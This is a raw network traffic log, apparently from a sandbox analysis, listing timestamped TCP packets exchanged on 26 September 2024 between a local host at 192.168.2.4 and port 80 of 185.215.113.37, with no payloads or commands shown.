Sep 26, 2024 18:27:14.353564024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.353604078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.353892088 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.353907108 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.353921890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.353945971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.353971004 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354058027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354072094 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354084969 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354099989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354115009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354119062 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354129076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354135990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354166985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354201078 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354217052 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354231119 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354244947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354259014 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354271889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354274988 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354286909 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354300976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354310036 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354315042 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354346037 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354372025 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354557037 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354578972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354593039 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354602098 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354609013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354619026 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354640007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354657888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354727983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354743004 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354756117 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354769945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354783058 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354785919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354798079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354820013 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354820013 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354835033 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354842901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354851007 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354865074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354882956 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354887009 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354901075 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354912996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354914904 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354929924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354938030 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354954958 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354960918 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.354969978 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354988098 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.354995966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.355035067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.355381012 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355402946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355418921 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355431080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355443954 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355448008 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.355483055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355494976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.355499029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355514050 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355528116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355542898 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355547905 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.355559111 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.355571032 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.355591059 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.355623960 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.450628996 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.450736046 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.450792074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.450829029 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.450844049 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.450879097 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.450973988 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451004982 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451020002 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451039076 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451052904 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451072931 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451086044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451119900 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451123953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451160908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451174021 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451195002 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451226950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451230049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451261044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451263905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451282024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451296091 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451308966 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451312065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451339006 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451344967 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451364994 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451379061 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451412916 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451428890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451431990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451479912 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451561928 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451594114 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451627970 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451641083 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451643944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451674938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451692104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451709032 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451728106 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451757908 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451761007 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451796055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451807022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451807976 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451838017 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451839924 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451863050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451874018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451884031 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451906919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451939106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451942921 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451965094 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.451972008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.451986074 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452006102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452029943 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452039003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452054024 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452071905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452106953 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452121019 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452131033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452156067 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452164888 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452227116 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452482939 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452521086 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452569962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452574968 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452604055 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452619076 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452636003 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452655077 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452670097 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452682018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452702999 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452721119 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452734947 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452747107 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452769041 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452780962 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452800989 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452812910 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452833891 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452846050 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452867031 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452882051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452899933 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452914000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452934027 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452944040 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.452967882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.452979088 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453001976 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453013897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453037977 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453048944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453069925 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453079939 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453103065 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453118086 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453133106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453156948 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453165054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453178883 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453197956 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453211069 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453231096 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453243971 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453264952 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453279018 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453295946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453315020 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453346014 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453407049 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453440905 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453457117 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453486919 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453485966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453520060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453536987 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453552008 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453578949 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453586102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453614950 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453629971 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453646898 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453661919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453677893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453695059 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453711033 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453727961 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453758955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453778982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453792095 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453819990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453824043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453856945 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.453871965 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453892946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.453932047 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.476366043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.476414919 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.476450920 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.476475954 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.476577044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.476577044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.577085972 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.577150106 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.577171087 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.577178001 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.577198982 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.577224970 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.577609062 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.577642918 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.577675104 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.577675104 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.577698946 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.577729940 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.577745914 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.577765942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.577775955 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.577836990 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.578340054 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.578372955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.578408957 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.578413010 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.578438997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.578460932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.579313040 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.579345942 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.579377890 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.579406023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.579406023 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.579432964 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.580049038 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.580079079 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.580110073 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.580111980 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.580130100 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.580144882 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.580167055 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.580183983 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.580185890 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.580218077 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.580234051 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.580251932 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.580270052 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.580298901 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.580714941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.580724955 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.580756903 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.580787897 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.580820084 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.582581043 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.582638979 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.582731962 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.582763910 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.582791090 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.582814932 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.583246946 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.583277941 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.583303928 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.583309889 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.583322048 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.583353043 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.583703995 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.583748102 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.583771944 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.583792925 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.583801985 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.583834887 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.583848000 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.583869934 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.583898067 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.583914042 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.583931923 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.583964109 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.583992958 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.583997011 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584014893 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584031105 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584048986 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584068060 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584080935 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584105015 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584188938 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584220886 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584244967 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584254026 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584276915 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584289074 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584302902 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584321022 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584336996 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584372997 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584469080 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584501028 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584525108 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584533930 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584562063 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584566116 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584583044 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584599018 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584609985 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584630966 CEST	80	49730	185.215.113.37	192.168.2.4
Sep 26, 2024 18:27:14.584644079 CEST	49730	80	192.168.2.4	185.215.113.37
Sep 26, 2024 18:27:14.584665060 CEST	80	49730	185.215.113.37	192.168.2.4
